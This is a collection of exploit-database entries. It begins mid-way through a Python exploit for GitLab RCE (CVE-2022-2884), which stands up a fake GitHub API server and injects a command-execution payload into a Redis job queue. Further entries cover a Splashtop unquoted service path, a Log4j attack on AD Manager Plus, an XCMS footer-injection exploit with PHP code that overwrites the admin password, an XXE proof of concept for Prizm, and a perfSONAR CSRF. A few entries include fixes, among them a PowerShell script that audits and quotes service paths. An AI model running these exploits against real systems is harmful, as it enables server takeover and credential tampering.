    rce_payload = f"lpush resque:gitlab:queue:system_hook_push \"{{\\\"class\\\":\\\"PagesWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"IO.read('| ' {encoded_command} ' ')\\\"], \\\"queue\\\":\\\"system_hook_push\\\"}}\""
    logging.debug(f"rce_payload = {rce_payload}")
    return rce_payload


def generate_user_response(attacker_server, fake_user, fake_user_id):
    response = {
        "avatar_url": f"{attacker_server}/avatars/{fake_user_id}",
        "events_url": f"{attacker_server}/users/{fake_user}/events{{/privacy}}",
        "followers_url": f"{attacker_server}/users/{fake_user}/followers",
        "following_url": f"{attacker_server}/users/{fake_user}/following{{/other_user}}",
        "gists_url": f"{attacker_server}/users/{fake_user}/gists{{/gist_id}}",
        "gravatar_id": "",
        "html_url": f"{attacker_server}/{fake_user}",
        "id": int(fake_user_id),
        "login": f"{fake_user}",
        "node_id": base64encode(f"04:User{fake_user_id}"),
        "organizations_url": f"{attacker_server}/users/{fake_user}/orgs",
        "received_events_url": f"{attacker_server}/users/{fake_user}/received_events",
        "repos_url": f"{attacker_server}/users/{fake_user}/repos",
        "site_admin": False,
        "starred_url": f"{attacker_server}/users/{fake_user}/starred{{/owner}}{{/repo}}",
        "subscriptions_url": f"{attacker_server}/users/{fake_user}/subscriptions",
        "type": "User",
        "url": f"{attacker_server}/users/{fake_user}"
    }
    return response


def generate_user_full_response(attacker_server, fake_user, fake_user_id):
    partial = generate_user_response(attacker_server, fake_user, fake_user_id)
    others = {
        "bio": None,
        "blog": "",
        "company": None,
        "created_at": "2020-08-21T14:35:46Z",
        "email": None,
        "followers": 2,
        "following": 0,
        "hireable": None,
        "location": None,
        "name": None,
        "public_gists": 0,
        "public_repos": 0,
        "twitter_username": None,
        "updated_at": "2022-08-08T12:11:40Z",
    }
    response = {**partial, **others}
    return response


def generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id):
    response = {
        "allow_auto_merge": False,
        "allow_forking": True,
        "allow_merge_commit": True,
        "allow_rebase_merge": True,
        "allow_squash_merge": True,
        "allow_update_branch": False,
        "archive_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/{{archive_format}}{{/ref}}",
        "archived": False,
        "assignees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/assignees{{/user}}",
        "blobs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/blobs{{/sha}}",
        "branches_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/branches{{/branch}}",
        "clone_url": f"{attacker_server}/{fake_user}/{fake_repo}.git",
        "collaborators_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/collaborators{{/collaborator}}",
        "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/comments{{/number}}",
        "commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/commits{{/sha}}",
        "compare_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/compare/{{base}}...{{head}}",
        "contents_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contents/{{+path}}",
        "contributors_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contributors",
        "created_at": "2021-04-09T13:55:55Z",
        "default_branch": "main",
        "delete_branch_on_merge": False,
        "deployments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/deployments",
        "description": None,
        "disabled": False,
        "downloads_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/downloads",
        "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/events",
        "fork": False,
        "forks": 1,
        "forks_count": 1,
        "forks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/forks",
        "full_name": f"{fake_user}/{fake_repo}",
        "git_commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/commits{{/sha}}",
        "git_refs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/refs{{/sha}}",
        "git_tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/tags{{/sha}}",
        "git_url": f"git://{address}:{port}/{fake_user}/{fake_repo}.git",
        "has_downloads": True,
        "has_issues": True,
        "has_pages": False,
        "has_projects": True,
        "has_wiki": True,
        "homepage": None,
        "hooks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/hooks",
        "html_url": f"{attacker_server}/{fake_user}/{fake_repo}",
        "id": int(repo_id),
        "is_template": False,
        "issue_comment_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/comments{{/number}}",
        "issue_events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/events{{/number}}",
        "issues_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues{{/number}}",
        "keys_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/keys{{/key_id}}",
        "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/labels{{/name}}",
        "language": "Python",
        "languages_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/languages",
        "license": None,
        "merge_commit_message": "Message",
        "merge_commit_title": "Title",
        "merges_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/merges",
        "milestones_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/milestones{{/number}}",
        "mirror_url": None,
        "name": f"{fake_repo}",
        "network_count": 1,
        "node_id": base64encode(f"010:Repository{repo_id}"),
        "notifications_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/notifications{{?since,all,participating}}",
        "open_issues": 4,
        "open_issues_count": 4,
        "owner": generate_user_response(attacker_server, fake_user, fake_user_id),
        "permissions": {
            "admin": True,
            "maintain": True,
            "pull": True,
            "push": True,
            "triage": True
        },
        "private": True,
        "pulls_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/pulls{{/number}}",
        "pushed_at": "2022-08-14T15:36:21Z",
        "releases_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/releases{{/id}}",
        "size": 3802,
        "squash_merge_commit_message": "Message",
        "squash_merge_commit_title": "Title",
        "ssh_url": f"git@{address}:{fake_user}/{fake_repo}.git",
        "stargazers_count": 0,
        "stargazers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/stargazers",
        "statuses_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/statuses/{{sha}}",
        "subscribers_count": 1,
        "subscribers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscribers",
        "subscription_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscription",
        "svn_url": f"{attacker_server}/{fake_user}/{fake_repo}",
        "tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/tags",
        "teams_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/teams",
        "temp_clone_token": generate_random_string(32),
        "topics": [],
        "trees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/trees{{/sha}}",
        "updated_at": "2022-06-10T15:12:53Z",
        "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}",
        "use_squash_pr_title_as_default": False,
        "visibility": "private",
        "watchers": 0,
        "watchers_count": 0,
        "web_commit_signoff_required": False
    }
    return response


def generate_issue_response(attacker_server, fake_user, fake_user_id, fake_repo, fake_issue_id, command):
    rce_payload = generate_rce_payload(command)
    response = [
        {
            "active_lock_reason": None,
            "assignee": None,
            "assignees": [],
            "author_association": "OWNER",
            "body": "hn-issue description",
            "closed_at": None,
            "comments": 1,
            "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/comments",
            "created_at": "2021-07-23T13:16:55Z",
            "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/events",
            "html_url": f"{attacker_server}/{fake_user}/{fake_repo}/issues/3",
            "id": int(fake_issue_id),
            "labels": [],
            "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/labels{{/name}}",
            "locked": False,
            "milestone": None,
            "node_id": base64encode(f"05:Issue{fake_issue_id}"),
            "_number": 1,
            "number": {"to_s": {"bytesize": 2, "to_s": f"1234{rce_payload}"}},
            "performed_via_github_app": None,
            "reactions": {
                "+1": 0,
                "-1": 0,
                "confused": 0,
                "eyes": 0,
                "heart": 0,
                "hooray": 0,
                "laugh": 0,
                "rocket": 0,
                "total_count": 0,
                "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/reactions"
            },
            "repository_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/test",
            "state": "open",
            "state_reason": None,
            "timeline_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/timeline",
            "title": f"{fake_repo}",
            "updated_at": "2022-08-14T15:37:08Z",
            "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3",
            "user": generate_user_response(attacker_server, fake_user, fake_user_id)
        }
    ]
    return response


@app.before_request
def received_request():
    logging.debug(f"Received request:")
    logging.debug(f"    url = {request.url}")
    logging.debug(f"headers = {request.headers}")


@app.after_request
def add_headers(response):
    response.headers["content-type"] = "application/json; charset=utf-8"
    response.headers["x-ratelimit-limit"] = "5000"
    response.headers["x-ratelimit-remaining"] = "4991"
    response.headers["x-ratelimit-reset"] = "1660136749"
    response.headers["x-ratelimit-used"] = "9"
    response.headers["x-ratelimit-resource"] = "core"
    return response


@app.route("/")
def index():
    return "The server is running."
@app.route("/api/v3/rate_limit") def api_rate_limit(): response = { "resources": { "core": { "limit": 5000, "used": 9, "remaining": 4991, "reset": 1660136749 }, "search": { "limit": 30, "used": 0, "remaining": 30, "reset": 1660133589 }, "graphql": { "limit": 5000, "used": 0, "remaining": 5000, "reset": 1660137129 }, "integration_manifest": { "limit": 5000, "used": 0, "remaining": 5000, "reset": 1660137129 }, "source_import": { "limit": 100, "used": 0, "remaining": 100, "reset": 1660133589 }, "code_scanning_upload": { "limit": 1000, "used": 0, "remaining": 1000, "reset": 1660137129 }, "actions_runner_registration": { "limit": 10000, "used": 0, "remaining": 10000, "reset": 1660137129 }, "scim": { "limit": 15000, "used": 0, "remaining": 15000, "reset": 1660137129 }, "dependency_snapshots": { "limit": 100, "used": 0, "remaining": 100, "reset": 1660133589 } }, "rate": { "limit": 5000, "used": 9, "remaining": 4991, "reset": 1660136749 } } return response @app.route("/api/v3/repositories/<repo_id>") @app.route("/repositories/<repo_id>") def api_repositories_repo_id(repo_id: int): address = current_app.config["address"] port = current_app.config["port"] attacker_server = current_app.config["attacker_server"] fake_user = current_app.config["fake_user"] fake_user_id = current_app.config["fake_user_id"] fake_repo = current_app.config["fake_repo"] response = generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id) return response @app.route("/api/v3/repos/<user>/<repo>") def api_repositories_repo_user_repo(user: string, repo: string): address = current_app.config["address"] port = current_app.config["port"] attacker_server = current_app.config["attacker_server"] fake_user_id = current_app.config["fake_user_id"] fake_repo_id = current_app.config["fake_repo_id"] response = generate_repo_response(address, port, attacker_server, user, fake_user_id, repo, fake_repo_id) return response @app.route("/api/v3/repos/<user>/<repo>/issues") def 
api_repositories_repo_user_repo_issues(user: string, repo: string): attacker_server = current_app.config["attacker_server"] fake_user_id = current_app.config["fake_user_id"] fake_issue_id = current_app.config["fake_issue_id"] command = current_app.config["command"] response = generate_issue_response(attacker_server, user, fake_user_id, repo, fake_issue_id, command) return response @app.route("/api/v3/users/<user>") def api_users_user(user: string): attacker_server = current_app.config["attacker_server"] fake_user_id = current_app.config["fake_user_id"] response = generate_user_full_response(attacker_server, user, fake_user_id) return response @app.route("/<user>/<repo>.git/HEAD") @app.route("/<user>/<repo>.git/info/refs") @app.route("/<user>/<repo>.wiki.git/HEAD") @app.route("/<user>/<repo>.wiki.git/info/refs") def empty_response(user: string, repo: string): logging.debug("Empty string response.") return "" # All the others/non-existing routes. @app.route('/<path:path>') def catch_all(path): logging.debug("Empty JSON array response.") return [] def main(): args = parse_arguments() logging_level = DEFAULT_LOGGING_LEVEL if args.verbose: logging_level = logging.DEBUG logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s") validate_input(args) url = args.url.strip() private_token = args.private_token.strip() target_namespace = args.target_namespace.strip() address = args.address.strip() port = args.port is_https = args.https command = args.command.strip() delay = args.delay logging.info(f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. 
- {VERSION}") logging.debug("Parameters:") logging.debug(f" url = {url}") logging.debug(f" private_token = {private_token}") logging.debug(f"target_namespace = {target_namespace}") logging.debug(f" address = {address}") logging.debug(f" port = {port}") logging.debug(f" is_https = {is_https}") logging.debug(f" command = {command}") logging.debug(f" delay = {delay}") fake_repo_id = generate_random_number(9) fake_github_server = Process(target=start_fake_github_server, args=(address, port, is_https, command, fake_repo_id)) fake_github_server.start() logging.info("Waiting for the fake GitHub server to start.") while not is_server_alive(address, port, is_https): time.sleep(1) logging.debug("Waiting for the fake GitHub server to start.") logging.info("Fake GitHub server is running.") try: send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id) except: logging.critical("Aborting the script.") fake_github_server.kill() sys.exit(1) if delay is not None: logging.info(f"Waiting for {delay} seconds to let attack finish.") time.sleep(delay) else: logging.info("Press Enter when the attack is finished.") input() logging.debug("Stopping the fake GitHub server.") fake_github_server.kill() logging.info("Closing the script.") if __name__ == "__main__": main()
  21. # Exploit Title: Splashtop 8.71.12001.0 - Unquoted Service Path
# Date: 12/20/2022
# Exploit Author: A.I. hernandez
# Version: 8.71.12001.0
# Vendor Homepage: https://www.splashtop.com
# Version: current version
# Tested on: Windows 10 21H2

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Splashtop Software Updater Service    SSUService    C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe    Auto

C:\>sc qc SSUService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SSUService
        TIPO                  : 10  WIN32_OWN_PROCESS
        TIPO_INICIO           : 2   AUTO_START
        CONTROL_ERROR         : 0   IGNORE
        NOMBRE_RUTA_BINARIO   : C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
        GRUPO_ORDEN_CARGA     :
        ETIQUETA              : 0
        NOMBRE_MOSTRAR        : Splashtop Software Updater Service
        DEPENDENCIAS          :
        NOMBRE_INICIO_SERVICIO: LocalSystem
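As an added example that is not part of the original post, the PowerShell script below audits every service (not only the auto-start, non-Windows ones the wmic filter above selects) for an unquoted ImagePath whose executable path contains a space, and with -Fix quotes the path in place, which is the remediation for this class of issue. It assumes the service definitions live under HKLM:\SYSTEM\CurrentControlSet\Services and that the executable name ends in .exe; the function and parameter names are this example's own.

```powershell
# Added example (not from the original advisory): report and optionally fix
# unquoted service paths. Run from an elevated prompt; -WhatIf previews the change.
[CmdletBinding(SupportsShouldProcess = $true)]
param(
    [switch]$Fix   # without -Fix the script only reports findings
)

$servicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'

function Get-UnquotedServicePath {
    # One object per service whose binary path is unquoted and contains a space.
    foreach ($key in Get-ChildItem -Path $servicesKey -ErrorAction SilentlyContinue) {
        $imagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
        if (-not $imagePath) { continue }
        $trimmed = $imagePath.Trim()
        # Already quoted: the SCM resolves it unambiguously, nothing to do.
        if ($trimmed.StartsWith('"')) { continue }
        # Split the executable (up to and including .exe) from any trailing arguments.
        if ($trimmed -notmatch '^(?<exe>.+?\.exe)(?<rest>\s.*)?$') { continue }
        $exe  = $Matches['exe']
        $rest = $Matches['rest']
        # Only a space inside the executable path makes the unquoted form ambiguous.
        if ($exe -notmatch '\s') { continue }
        [pscustomobject]@{
            Service   = $key.PSChildName
            ImagePath = $imagePath
            Quoted    = '"' + $exe + '"' + $rest
        }
    }
}

$findings = @(Get-UnquotedServicePath)
if ($findings.Count -eq 0) {
    Write-Host 'No unquoted service paths containing spaces were found.'
    return
}
$findings | Format-Table -AutoSize

if ($Fix) {
    foreach ($f in $findings) {
        # ShouldProcess makes -WhatIf and -Confirm work for the registry write.
        if ($PSCmdlet.ShouldProcess($f.Service, "Set ImagePath to $($f.Quoted)")) {
            Set-ItemProperty -Path (Join-Path $servicesKey $f.Service) -Name ImagePath `
                -Value $f.Quoted -Type ExpandString
        }
    }
}
```

Services with a driver-style path (no .exe) or an environment-variable path without spaces are skipped; the change takes effect the next time the service starts.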
  22. # Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE)
# Exploit Author: Chan Nyein Wai & Thura Moe Myint
# Vendor Homepage: https://www.manageengine.com/products/ad-manager/
# Software Link: https://www.manageengine.com/products/ad-manager/download.html
# Version: Ad Manager Plus Before 7122
# Tested on: Windows
# CVE : CVE-2021-44228
# Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md

### Description

In the summer of 2022, I was doing a security engagement on the Synack Red Team in collaboration with my good friend (Thura Moe Myint). At that time, Log4j was already widespread on the internet. Manage Engine had already patched Ad Manager Plus to prevent it from being affected by the Log4j vulnerability. They had mentioned that Log4j was not affected by Ad Manager Plus. However, we determined that Ad Manager Plus was running on our target and managed to exploit the Log4j vulnerability.

### Exploitation

First, let's make a login request using a proxy. Inject the following payload in the ```methodToCall``` parameter in the ```ADSearch.cc``` request. Then you will get the DNS callback with the username in your Burp Collaborator.

### Notes

When we initially reported this vulnerability to Synack, we only managed to get a DNS callback and our report was marked as LDAP injection. However, we attempted to gain full RCE on the host but were not successful. Later, we discovered that Ad Manager Plus was running on another target, so we tried to get full RCE on that target. We realized that there was a firewall and an anti-virus running on the machine, so most of our payloads wouldn't work. After spending a considerable amount of time, we eventually managed to bypass the firewall and anti-virus, and achieve full RCE.

### Conclusion

We had already informed Zoho about the Log4j vulnerability, and even after it was fixed, they decided to reward us with a bonus bounty for our report.

### Mitigation

Updating to a version of Ad Manager Plus higher than 7122 should resolve the issue.
  23. Exploit Title: XCMS v1.83 - Remote Command Execution (RCE)
Author: Onurcan
Email: [email protected]
Site: ihteam.net
Script Download : http://www.xcms.it
Date: 26/12/2022

The xcms's footer (that is in "/dati/generali/footer.dtb") is included in each page of the xcms. Taking "home.php" for example:

<?php
//home.php
[...]
include(CSTR."footer".STR); // <- "CSTR" and "STR" are the constants previously declared. They refer to "/dati/generali" and "dtb"
?>

So the xcms allows you to modify the footer through a bugged page called cpie.php included in the admin panel. So let's take a look at the bugged code.

<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){
    header("location:index.php");
} // <- so it misses an exit() :-D
[...]
if(isset($_POST['salva'])){
    Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- saves the changes without any kind of control
}
[...]
?>

So with a simple html form we can change the footer. Ex:

<form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&pg=admin&s=cpie" method="post">
<input type="hidden" name="salva" value="OK" />
<textarea name="testo_0"><?php YOUR PHP CODE ?></textarea>
<input type="submit" value="Modifica" />
</form>
<script>document.editor.submit()</script>

Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials.

Trick: We can change the admin panel password by inserting this code in the footer:

<?php
$pwd = "owned"; // <- Place here your new password.
$pwd2 = md5($pwd);
unlink("dati/generali/pass.php");
$f = fopen("dati/generali/pass.php","w"); // mode must be the string "w"
fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>");
fclose($f);
?>

This code deletes the old password file and then creates a new one with your new password.

Fix:

<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){
    header("location:index.php");
    exit();
} // with an exit() we can fix the bug.
[...]
if(isset($_POST['salva'])){
    Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- saves the changes without any kind of control
}
[...]
?>

So this is a simple exploit:

<?php
if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){
    echo "
<form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\">
<input type=\"hidden\" name=\"salva\" value=\"OK\" />
<textarea name=\"testo_0\">".$_POST['code']."</textarea>
<input type=\"submit\" value=\"Modifica\" />
</form>
<script>document.editor.submit()</script>";
}else{
    echo "
<pre>
XCMS <= v1.82 Remote Command Execution Vulnerability
Dork : inurl:\"mod=notizie\"
by Onurcan
Visit ihteam.net
</pre>
<form method=POST action=\"".$_SERVER['PHP_SELF']."\">
<pre>
Site : <input type=text name=site />
Code : <textarea name=code cols=49 rows=14>Your code here</textarea>
<input type=submit value=Exploit />
<input type=hidden name=\"send\" />
</pre>
</form>";
}
?>
  24. # Exploit Title: Prizm Content Connect v10.5.1030.8315 - XXE
# Date: 21/12/2022
# Exploit Author: @xhzeem
# Vendor Homepage: https://help.accusoft.com/PCC/v9.0/HTML/About%20Prizm%20Content%20Connect.html
# Version: v10.5.1030.8315

Prizm Content Connect v10.5.1030.8315 is vulnerable to XXE.

Proof Of Concept:

http://www.example.com/default.aspx?document=file.xml

The file.xml can have an OoB XXE payload or any other blind XXE exploit.
  25. Exploit Title: perfSONAR v4.4.5 - Partial Blind CSRF
Link: https://github.com/perfsonar/
Affected Versions: v4.x <= v4.4.5
Vulnerability Type: Partial Blind CSRF
Discovered by: Ryan Moore
CVE: CVE-2022-41413

Summary

A partial blind CSRF vulnerability exists in perfSONAR v4.x <= v4.4.5 within the /perfsonar-graphs/ test results page. Parameters and values can be injected/passed via the URL parameter, forcing the client to connect unknowingly in the background to other sites via transparent XMLHTTPRequests. This partial blind CSRF bypasses the built-in whitelisting function in perfSONAR. This vulnerability was patched in perfSONAR v4.4.6.

Proof of Concept Examples

Here are two examples of this vulnerability. For further details, review the Technical Overview section below.

Example 1: Client browser connects to www.google.com in the background.

http://192.168.68.145/perfsonar-graphs/?source=1&dest=2&url=https://www.google.com

Example 2: Client browser connects to arbitrary IP and port in the background, passing delete parameter to /api endpoint.

http://192.168.68.145/perfsonar-graphs/?source=8.8.8.8&dest=%26action%3Ddelete&url=http://192.168.68.113:4444/api